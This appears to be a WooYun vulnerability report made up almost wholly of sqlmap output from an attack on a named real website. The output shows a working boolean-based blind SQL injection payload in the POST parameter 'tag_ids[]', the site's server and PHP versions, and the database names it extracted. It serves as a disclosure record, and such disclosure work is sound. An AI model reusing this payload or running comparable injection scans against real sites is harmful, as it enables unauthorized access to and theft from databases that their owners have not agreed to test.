WooYun.org

[*] starting at 14:49:27
[14:49:27] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[14:49:29] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.ycpai.com/'. Do you want to follow? [Y/n] n
[14:49:31] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag_ids[]=113&tag_ids[]=106&tag_ids[]=1 and 1=if((1=1 ) AND 5165=5165 AND (8198=8198 ),1,(select 1 union select 2))
---
[14:49:31] [INFO] testing MySQL
[14:49:31] [INFO] confirming MySQL
[14:49:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
[14:49:31] [INFO] fetching database names
[14:49:31] [INFO] fetching number of databases
[14:49:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:49:31] [INFO] retrieved: 2
[14:49:34] [INFO] retrieved: information_schema
[14:50:57] [INFO] retrieved: app_ycpai
available databases [2]:
[*] app_ycpai
[*] information_schema